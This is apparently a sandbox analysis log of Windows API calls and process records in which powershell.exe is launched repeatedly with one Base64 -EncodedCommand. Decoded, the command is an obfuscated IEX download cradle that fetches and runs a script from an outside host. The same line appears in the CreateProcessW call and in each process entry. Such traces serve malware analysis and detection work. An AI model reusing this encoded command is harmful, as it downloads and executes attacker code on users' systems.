	[0772.970] SetErrorMode (uMode=0x1) returned 0x1
	[0772.970] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.970] SetErrorMode (uMode=0x1) returned 0x1
	[0772.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.970] SetErrorMode (uMode=0x1) returned 0x1
	[0772.971] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.971] SetErrorMode (uMode=0x1) returned 0x1
	[0772.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.971] SetErrorMode (uMode=0x1) returned 0x1
	[0772.971] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.972] SetErrorMode (uMode=0x1) returned 0x1
	[0772.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.972] SetErrorMode (uMode=0x1) returned 0x1
	[0772.972] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.972] SetErrorMode (uMode=0x1) returned 0x1
	[0772.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.973] SetErrorMode (uMode=0x1) returned 0x1
	[0772.973] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.973] SetErrorMode (uMode=0x1) returned 0x1
	[0772.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.973] SetErrorMode (uMode=0x1) returned 0x1
	[0772.973] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.974] SetErrorMode (uMode=0x1) returned 0x1
	[0772.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0772.974] SetErrorMode (uMode=0x1) returned 0x1
	[0772.974] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.674] SetErrorMode (uMode=0x1) returned 0x1
	[0773.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0773.674] SetErrorMode (uMode=0x1) returned 0x1
	[0773.674] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.675] SetErrorMode (uMode=0x1) returned 0x1
	[0773.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0773.675] SetErrorMode (uMode=0x1) returned 0x1
	[0773.675] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.675] SetErrorMode (uMode=0x1) returned 0x1
	[0773.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0773.676] SetErrorMode (uMode=0x1) returned 0x1
	[0773.676] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0773.676] SetErrorMode (uMode=0x1) returned 0x1
	[0773.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0773.676] SetErrorMode (uMode=0x1) returned 0x1
	[0773.676] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x30bf90
	[0773.677] FindNextFileW (in: hFindFile=0x30bf90, lpFindFileData=0x1c6edc70 | out: lpFindFileData=0x1c6edc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0773.678] FindClose (in: hFindFile=0x30bf90 | out: hFindFile=0x30bf90) returned 1
	[0773.678] SetErrorMode (uMode=0x1) returned 0x1
	[0773.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6edd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0773.679] SetErrorMode (uMode=0x1) returned 0x1
	[0773.679] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6edf90 | out: lpFileInformation=0x1c6edf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0773.679] SetErrorMode (uMode=0x1) returned 0x1
	[0773.680] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0773.680] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.681] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0773.682] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.685] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0773.685] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.694] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0773.694] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.707] CoTaskMemAlloc (cb=0x3b) returned 0x2493a0
	[0773.708] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6ee178, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6ee178) returned 0x4550
	[0773.709] CoTaskMemFree (pv=0x2493a0) 
	[0773.712] GetConsoleWindow () returned 0x1060c
	[0773.730] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0773.730] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.731] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.731] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0773.731] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.737] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0773.737] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0773.737] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0773.739] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c6ee1c0 | out: pNumArgs=0x1c6ee1c0) returned 0x1b7d9610*=""
	[0773.741] lstrlenW (lpString="-EncodedCommand") returned 15
	[0773.742] CoTaskMemAlloc (cb=0x22) returned 0x1b7e40c0
	[0773.742] RtlMoveMemory (in: Destination=0x1b7e40c0, Source=0x1b7d9632, Length=0x20 | out: Destination=0x1b7e40c0) 
	[0773.742] CoTaskMemFree (pv=0x1b7e40c0) 
	[0773.742] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0773.742] CoTaskMemAlloc (cb=0x2f4) returned 0x1b800250
	[0773.742] RtlMoveMemory (in: Destination=0x1b800250, Source=0x1b7d9652, Length=0x2f2 | out: Destination=0x1b800250) 
	[0773.742] CoTaskMemFree (pv=0x1b800250) 
	[0773.743] LocalFree (hMem=0x1b7d9610) returned 0x0
	[0773.744] CoTaskMemAlloc (cb=0x804) returned 0x1b801480
	[0773.744] GetConsoleTitleW (in: lpConsoleTitle=0x1b801480, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0773.744] CoTaskMemFree (pv=0x1b801480) 
	[0773.753] CoTaskMemAlloc (cb=0x38e) returned 0x1b7d9610
	[0773.753] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c6ee120*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ffa8c8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2ffa8c8*(hProcess=0x39c, hThread=0x398, dwProcessId=0x21cc, dwThreadId=0x21d0)) returned 1
	[0774.779] CoTaskMemFree (pv=0x1b7d9610) 
	[0774.780] CloseHandle (hObject=0x398) returned 1
	[0774.780] CoTaskMemAlloc (cb=0x3b) returned 0x2493a0
	[0774.780] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6ee1c8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6ee1c8) returned 0x4550
	[0774.781] CoTaskMemFree (pv=0x2493a0) 
	[0774.784] GetCurrentProcess () returned 0xffffffffffffffff
	[0774.784] GetCurrentProcess () returned 0xffffffffffffffff
	[0774.785] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ee2a8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ee2a8*=0x398) returned 1

Process:
	id = "112"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x64417000"
	os_pid = "0x7b8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 585
	os_tid = 0x948


Thread:
	id = 660
	os_tid = 0x149c


Thread:
	id = 663
	os_tid = 0x14a8


Thread:
	id = 2123
	os_tid = 0x1b1c


Thread:
	id = 2124
	os_tid = 0x2410


Thread:
	id = 2126
	os_tid = 0x2430


Process:
	id = "113"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5f7a7000"
	os_pid = "0x1210"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "26"
	os_parent_pid = "0xb00"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 588
	os_tid = 0xd8c


Thread:
	id = 601
	os_tid = 0xdf4


Thread:
	id = 603
	os_tid = 0x12f4


Process:
	id = "114"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x62725000"
	os_pid = "0xd50"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 589
	os_tid = 0xa1c


Thread:
	id = 633
	os_tid = 0x1408


Thread:
	id = 650
	os_tid = 0x1458


Thread:
	id = 1802
	os_tid = 0x1ec4


Thread:
	id = 1804
	os_tid = 0x1f20


Thread:
	id = 1822
	os_tid = 0x21b4


Thread:
	id = 1946
	os_tid = 0x2654


Process:
	id = "115"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x62f31000"
	os_pid = "0x5e4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 591
	os_tid = 0x1244


Thread:
